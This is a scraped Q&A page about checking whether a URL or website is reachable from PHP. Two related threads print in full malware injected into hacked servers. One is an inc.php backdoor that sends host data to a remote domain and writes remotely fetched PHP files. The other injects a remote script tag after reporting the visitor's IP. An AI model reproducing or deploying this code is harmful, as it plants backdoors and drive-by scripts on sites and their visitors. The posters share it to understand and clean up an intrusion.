How to check if website is accessible? - php

I want to see if a website can be accessed or not with a PHP page.
Here is my plan:
<?php
$website = /* bool to see if site is up */
if($website)
{
echo'<iframe src="http://64.126.89.241/" width="100%" height="100%"/>';
}else
{
echo'<iframe src="http://tsiserver.us/backup/" width="100%" height="100%"/>';
}
?>
The website will be hosted on another server, therefore if my internet goes down, a user may access the backup version of a site.

Here is a simple function that will determine if a website exists using PHP and cURL
function urlExists($url=NULL)
{
if($url == NULL) return false;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($ch);
$httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if($httpcode>=200 && $httpcode<300){
return true;
} else {
return false;
}
}
This was grabbed from this post on how to check if a URL exists. Because Twitter should provide an error message above 300 when it is in maintenance, or a 404, this should work perfectly.
reference : https://stackoverflow.com/a/1239090/568414

Based on your approach, you would need 3 different servers:
The server that hosts the script
The server that hosts the website
The server that hosts the fallback website
This is not so efficient and many hosting services provide fallback or cached versions of your site in case it's down, automatically. You don't have to mess with a script for this, but if you insist, you can refer to PHP's curl manual.

The answer is here, thanks guys!
<?php
function ping($host, $port, $timeout) {
$tB = microtime(true);
$fP = fSockOpen($host, $port, $errno, $errstr, $timeout);
if (!$fP) { return "down"; }
$tA = microtime(true);
return round((($tA - $tB) * 1000), 0)." ms";
}
$website = ping("64.126.89.241", 80, 10);
if($website != "down"){
echo'<iframe src="http://64.126.89.241/" width="100%" height="100%"/>';
}else{
echo'<iframe src="http://tsiserver.us/backup/" width="100%" height="100%"/>';
}
?>

Related

My server was hacked. Somebody uploaded some scripts which I have no idea what those scripts has done to my server

Someone uploaded this script on our server
https://github.com/mIcHyAmRaNe/wso-webshell
And we have found inc.php files in different directories on our server. The inc file has this code in it
<?php
error_reporting(0);
$s='http://a1b2cd.club/';
$host = str_replace('www.', '', #$_SERVER['HTTP_HOST']);
$x = $s.'l-'.base64_encode($host);
if(function_exists('curl_init'))
{
$ch = #curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);
if($gitt == false){
#$gitt = file_get_contents($x);
}
}elseif(function_exists('file_get_contents')){
#$gitt = file_get_contents($x);
}
echo $gitt;
if(isset($_GET['ksfg'])){
$f=fopen($_GET['ksfg'].'.php','a');
fwrite($f,file_get_contents($s.'s-'.$_GET['ksfg']));
fclose($f);
}
echo '<!DOCTYPE html!>';
?><?php
function GetIP(){
if(getenv("HTTP_CLIENT_IP")) {
$ip = getenv("HTTP_CLIENT_IP");
} elseif(getenv("HTTP_X_FORWARDED_FOR")) {
$ip = getenv("HTTP_X_FORWARDED_FOR");
if (strstr($ip, ',')) {
$tmp = explode (',', $ip);
$ip = trim($tmp[0]);
}
} else {
$ip = getenv("REMOTE_ADDR");
}
return $ip;
}
$x = base64_decode('aHR0cDovL2J5cjAwdC5jby9sLQ==').GetIP().'-'.base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
if(function_exists('curl_init'))
{
$ch = #curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);
if($gitt == false){
#$gitt = file_get_contents($x);
}
}elseif(function_exists('file_get_contents')){
#$gitt = file_get_contents($x);
}
?>
</marquee><script src=http://expoilt.com/ccb.js></script>
No idea what this script has done to our server. As our server is hosted on so should we create the new instance? or should we suspend cpanel account from whm and create a new one and copy each and every file there? Please help me to understand what this could code actually do
if you get hacked try to change first all the passwords and recheck the code added by yourself (original version till 3-rd party got into your site ... maybe put site offline till checks ...). Possible to have a defect there, which allowed 3-rd party to upload whatever wanted on your site ! (this have to be fixed)
Regarding the added code, basically it's listing your site contends and ip-s(and some redirects ! - very dangerous for regular users). But what ever 3-rd party is going to do, have no clue ! (when get from outside admin privileges you could say that now it's acting as your_site owner).

How to use "fallback" method for PHP curl (HTTPS)?

Situation: I'm improving some code on a PHP based monitoring web app that checks the health of other web apps/services.
Goal: we are using CURL as a primary method to get headers to ensure the monitored app is accessible via HTTP return codes. This works great as of now. However, we are trying to build in a "fallback" method in which IF the CURL HTTP code response from the monitored app is outside of our defined variables (ie http code 404), PHP would then use a PING-like function to check if there is any response at that same address (for example, webserver is still "running" (occupying the given port) but not serving proper headers).
Problem: Our fallback method (stream_socket_client) DOES work for non-secure sites as we can simply define "hostname:port" which BOTH curl and stream_socket_client can use. However, If we want to monitor a secure site (HTTPS), curl requires the HTTPS protocol to be defined before the host - which will then make our fallback method (stream_socket_client) function fail as it only uses host:port format.
So, for example:
$URL: https://example.com:443 (this would turn a "GOOD" CURL response, but a down stream_socket_client response)
$URL: example.com:443 (this would return a "UP" stream_socket_client response, but a "DOWN" CURL response)
So, if we used https://example.com:443 as our URL, and the webserver became unresponsive, but is still running on that port, both would fail because HTTPs is defined.
This is a simplified version of our current code:
<?php
$url = "example.com:80";
function curl($url) {
$handle = curl_init($url);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($handle, CURLOPT_HEADER, true);
curl_setopt($handle, CURLOPT_NOBODY, true);
curl_setopt($handle, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($handle, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($handle, CURLOPT_URL, $url);
$response = curl_exec($handle);
$httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE);
if($httpCode >= 200 && $httpCode < 400 || $httpCode == 401 || $httpCode == 405) {
echo "CURL GOOD, $httpCode";
echo "STATUS: GREEN";
}
else {
$fp = stream_socket_client("$url", $errno, $errstr);
if (!$fp) {
echo "CURL BAD, PING DOWN";
echo "STATUS: RED";
}
else {
echo "CURL BAD PING UP";
echo "STATUS: YELLOW";
}
}
curl_close($handle);
};
?>
Any ideas how to use a fallback method to check if a port is open or not? I don't have to stick with PHP, can use some JS, but would prefer PHP.
EDIT 1:
Thanks to #drew010 I know I need to ultimately use fsockopen. However, I'll need to use parse_url() which can then pass a "sterile" URL to fsockopen for fallback "ping" check.
However, I'm not sure how to strip ONLY the protocol and leave the port and sub path (if defined). I'm also not sure how to pass the sterile URL to the fsockeopn function to use for the check. So far I have the code below, but I know I'm missing some code.
The below code parses http://example.com to example.com.
function parseurl($url) {
$url = 'http://example.com:80';
$host = parse_url($url, PHP_URL_HOST);
//this works for stripping protocol and "wwww" but need to leave port and sub path if defined.
if (!$host)
$host = $url;
if (substr($host, 0, 4) == "www.")
$host = substr($host, 4);
if (strlen($host) > 50)
$host = substr($host, 0, 47) . '...';
return $host;
}
// How to pass steril URL to PING function??
function ping($host, $timeout = 1) {
if (!fsockopen($host, $port, $errno, $errstr, $timeout)) {
return false;
echo "OPEN";
}
else {
echo "CLOSED";
}
}
Found the answer:
This script uses CURL to check if given HOST is serving a webpage.
If NOT, use a PING function to check if anything is listening on given port.
<?php
* This script uses CURL to check if given HOST is serving a webpage.
* If NOT, use a PING function to check if anything is listening on given port.
//* URL MUST contain a PORT after HOST
//* URL CAN include any protocol or sub-path
// sanitizes URL to host:port:path ONLY. (if PORT, PATH don't exist, it is ignored):
function url_to_domain($url) {
$url = 'http://google.com:80';
echo "Input URL ..... $url<br />\n";
$host = parse_url($url, PHP_URL_HOST);
$port = parse_url($url, PHP_URL_PORT);
$path = parse_url($url, PHP_URL_PATH);
// If the URL can't be parsed, use the original URL
// Change to "return false" if you don't want that
if (!$host)
echo "fail";
// $host = $url;
// remove "http/s" and "www" :
if (substr($host, 0, 4) == "www.")
$host = substr($host, 4);
if (strlen($host) > 50)
$host = substr($host, 0, 47) . '...';
// contruct sanitized URL, add ":port/path" to HOST:
return $host . ":" . $port . $path;
}
// pings "sanitized" URL:
$url = (url_to_domain($url));
$fp = pfsockopen($url, $errno, $errstr, $timeout = 5);
if (!$fp) {
echo "Ping URL ...... $url <br />\n ";
echo "URL status ..... CLOSED <br />\n";
echo "Error ............... $errstr ($errno)<br />\n";
}
else {
// $out = "GET / HTTP/1.1\r\n";
// $out .= "$url\r\n";
// $out .= "Connection: Close\r\n\r\n";
//fwrite ($fp, $out);
//displays header:
/*
while (!feof($fp)) {
echo fgets($fp, 128);
}
*/
// fclose($fp);
echo "Ping URL ...... $url <br />\n ";
echo "URL status .... OPEN";
}
?>

PHP: cURL refuse connection to URL and send GET information on some server

I made function to read GeoPlugin data for my websites and on one server I find wierd issue. All cURL request are refused. Here is part of my code:
protected $url='http://www.geoplugin.net/json.gp?ip={IP}&base_currency={CURRENCY}';
protected function __get_data($ip=false, $currency='')
{
// Current or custom IP
$ip = ((is_bool($ip) && $ip==false) ? $this->__ip() : $ip);
if($ip!='127.0.0.1' || $ip!='0.0.0.0')
{
// Configure GET function
$url = str_replace('{IP}', $ip, $this->url );
if(empty($currency))
$url = str_replace( '&base_currency={CURRENCY}', '', $url);
else
$url = str_replace( '{CURRENCY}', $currency, $url);
// Get content from URL
if(function_exists("curl_init"))
{
$cURL = curl_init();
curl_setopt($cURL, CURLOPT_URL, $url);
curl_setopt($cURL, CURLOPT_CONNECTTIMEOUT ,5);
curl_setopt($cURL, CURLOPT_TIMEOUT , 2);
curl_setopt($cURL, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($cURL, CURLOPT_RETURNTRANSFER, true);
curl_setopt($cURL, CURLOPT_HTTPHEADER, array('Accept: application/json'));
$result = curl_exec($cURL);
curl_close($cURL);
}
else
{
$result = file_get_contents($url);
}
// Return objects from JSON data
if($result!=false)
{
return json_decode($result);
}
else return false;
}
else return false;
}
## find real IP adress of visitor ##
protected function __ip()
{
$findIP=array(
'HTTP_CLIENT_IP',
'HTTP_X_FORWARDED_FOR',
'HTTP_X_FORWARDED',
'HTTP_X_CLUSTER_CLIENT_IP',
'HTTP_FORWARDED_FOR',
'HTTP_FORWARDED',
'REMOTE_ADDR'
);
$ip = '';
foreach($findIP as $http)
{
if(function_exists("getenv"))
{
$ip = getenv($http);
}
else
{
if (array_key_exists($http, $_SERVER) !== false){
foreach (explode(',', $_SERVER[$http]) as $findIP){
$ip = trim($findIP);
}
}
}
if(function_exists("filter_var") && !empty($ip))
{
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) return $ip;
}
else if(preg_match('/^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/', $ip) && !empty($ip))
{
return $ip;
}
}
return '0.0.0.0';
}
On arround90 websites everithing work perfectly, on one website with var_dump() I find that connection are refused. I try also with file_get_contents and the same results. I try also just cURL call in some test PHP file separated from website and the same results. What can be a problem?
It's may be DNS problem;
It's may be poor connection (more time needed for loading);
Your query may be banned from target server, because from your IP (source's server IP) too much queries for a time, more than limits.
What you can do:
Make sure that you can open target url from source server without using cURL (if you use simple hosting, I mean not VPS, you'll can't check it);
Increase values for CURLOPT_CONNECTTIMEOUT and CURLOPT_TIMEOUT;
If problem will not solved, you should use proxy with cURL (look for official documentation about CURLOPT_PROXY and other proxy options for curl_setopt function).
cURL might be disabled in your server.
Please run the phpinfo() to check the status of cURL.
If it is disabled, please install cURL and enable it in PHP.

Malicious PHP code injected into a PHP file

Last week we had a problem on our server where code was injected into PHP files. I was wondering what the cause of this could have been. The code snippet that has been injected into our files looked something like this.
#be7339#
if (empty($qjqb))
{
error_reporting(0);
#ini_set('display_errors', 0);
if (!function_exists('__url_get_contents'))
{
function __url_get_contents($remote_url, $timeout)
{
if(function_exists('curl_exec'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $remote_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
$_url_get_contents_data = curl_exec($ch);
curl_close($ch);
}
elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen'))
{
$ctx = #stream_context_create(array('http' =>array('timeout' => $timeout,)));
$_url_get_contents_data = #file_get_contents($remote_url, false, $ctx);
} elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
$handle = #fopen($remote_url, "r");
$_url_get_contents_data = #stream_get_contents($handle);
} else {
$_url_get_contents_data = __file_get_url_contents($remote_url);
}
return $_url_get_contents_data;
}
}
if (!function_exists('__file_get_url_contents'))
{
function __file_get_url_contents($remote_url)
{
if (preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i', $remote_url, $matches))
{
$protocol = strtolower($matches[1]);
$host = $matches[2];
$path = $matches[3];
} else {
// Bad remote_url-format
return FALSE;
}
if ($protocol == "http")
{
$socket = #fsockopen($host, 80, $errno, $errstr, $timeout);
} else
{
// Bad protocol
return FALSE;
}
if (!$socket)
{
// Error creating socket
return FALSE;
}
$request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
$len_written = #fwrite($socket, $request);
if ($len_written === FALSE || $len_written != strlen($request))
{
// Error sending request
return FALSE;
}
$response = "";
while (!#feof($socket) &&
($buf = #fread($socket, 4096)) !== FALSE) {
$response .= $buf;
}
if ($buf === FALSE) {
// Error reading response
return FALSE;
}
$end_of_header = strpos($response, "\r\n\r\n");
return substr($response, $end_of_header + 4);
}
}
if (empty($__var_to_echo) && empty($remote_domain))
{
$_ip = $_SERVER['REMOTE_ADDR'];
$qjqb = "http://pleasedestroythis.net/L3xmqGtN.php";
$qjqb = __url_get_contents($qjqb."?a=$_ip", 1);
if (strpos($qjqb, 'http://') === 0)
{
$__var_to_echo = '<script type="text/javascript" src="' . $qjqb . '?id=13028308"></script>';
echo $__var_to_echo;
}
}
}
I would like to ask how this could have happened. And how to prevent this in the future.
Thanks in advance.
Script (PHP) code injection usually means that someone has gotten hold of the password(s) to your hosting account. At the very minimum scan your PCs for spyware and viruses, and then change your passwords. Use SSL when connecting to your hosting account control panel, if possible. Be careful about using FTP, as it sends passwords in the clear. See if your host supports a more secure file transfer method.
The most common way this happens is you probably have a script that allows files uploads. Then if the script is not validating what file is uploaded a malicious user could upload a php file.
If your upload folder allows parsing of PHP files the user could run that PHP file in the browser, it could be some sort of file explorer which will then show the user all the files on your server. Now if any files have the right permissions the user could easily edit the file to include the extra code you are seeing.
Usually it's because somebody else got access to your FTP or you allow uploading PHP files.
You should look into other files, because there could be another code, that keeps adding those lines to your code (just guess because of "#be7339#" at the beginning.
What is the Apache version on your server ? This problem can come from using an outdated version..
Look at this link about security breaches on old versions Apache:
http://httpd.apache.org/security/vulnerabilities_20.html

PHP Curl check for file existence before downloading

I am writing a PHP program that downloads a pdf from a backend and save to a local drive. Now how do I check whether the file exists before downloading?
Currently I am using curl (see code below) to check and download but it still downloads the file which is 1KB in size.
$url = "http://wedsite/test.pdf";
$path = "C:\\test.pdf;"
downloadAndSave($url,$path);
function downloadAndSave($urlS,$pathS)
{
$fp = fopen($pathS, 'w');
$ch = curl_init($urlS);
curl_setopt($ch, CURLOPT_FILE, $fp);
$data = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo $httpCode;
//If 404 is returned, then file is not found.
if(strcmp($httpCode,"404") == 1)
{
echo $httpCode;
echo $urlS;
}
fclose($fp);
}
I want to check whether the file exists before even downloading. Any idea how to do it?
You can do this with a separate curl HEAD request:
curl_setopt($ch, CURLOPT_NOBODY, true);
$data = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
When you actually want to download you can use set NOBODY to false.
Call this before your download function and it's done:
<?php function remoteFileExists($url) {
$curl = curl_init($url);
//don't fetch the actual page, you only want to check the connection is ok
curl_setopt($curl, CURLOPT_NOBODY, true);
//do request
$result = curl_exec($curl);
$ret = false;
//if request did not fail
if ($result !== false) {
//if request was ok, check response code
$statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if ($statusCode == 200) {
$ret = true;
}
}
curl_close($curl);
return $ret;
}
?>
Since you are using HTTP to fetch a resource on the internet, what you really want to check is that the return code is a 404.
On some PHP installations, you can just use file_exists($url) out of the box. This does not work in all environments, however. http://www.php.net/manual/en/wrappers.http.php
Here is a function much like file_exists but for URLs, using curl:
<?php function curl_exists()
$file_headers = #get_headers($url);
if($file_headers[0] == 'HTTP/1.1 404 Not Found') {
$exists = false;
}
else {
$exists = true;
}
} ?>
source: http://www.php.net/manual/en/function.file-exists.php#75064
Sometimes the CURL extension isn't installed with PHP. In that case you can still use the socket library in the PHP core:
<?php function url_exists($url) {
$a_url = parse_url($url);
if (!isset($a_url['port'])) $a_url['port'] = 80;
$errno = 0;
$errstr = '';
$timeout = 30;
if(isset($a_url['host']) && $a_url['host']!=gethostbyname($a_url['host'])){
$fid = fsockopen($a_url['host'], $a_url['port'], $errno, $errstr, $timeout);
if (!$fid) return false;
$page = isset($a_url['path']) ?$a_url['path']:'';
$page .= isset($a_url['query'])?'?'.$a_url['query']:'';
fputs($fid, 'HEAD '.$page.' HTTP/1.0'."\r\n".'Host: '.$a_url['host']."\r\n\r\n");
$head = fread($fid, 4096);
$head = substr($head,0,strpos($head, 'Connection: close'));
fclose($fid);
if (preg_match('#^HTTP/.*\s+[200|302]+\s#i', $head)) {
$pos = strpos($head, 'Content-Type');
return $pos !== false;
}
} else {
return false;
}
} ?>
source: http://www.php.net/manual/en/function.file-exists.php#73175
An even faster function can be found here:
http://www.php.net/manual/en/function.file-exists.php#76246
In the first example above $file_headers[0] may contain more than or something other than 'HTTP/1.1 404 Not Found', e.g:
HTTP/1.1 404 Document+%2Fdb%2Fscotbiz%2Freports%2FR20131212%2Exml+not+found
So it's important to use some other test, e.g., regex, as '==' is not reliable.

Categories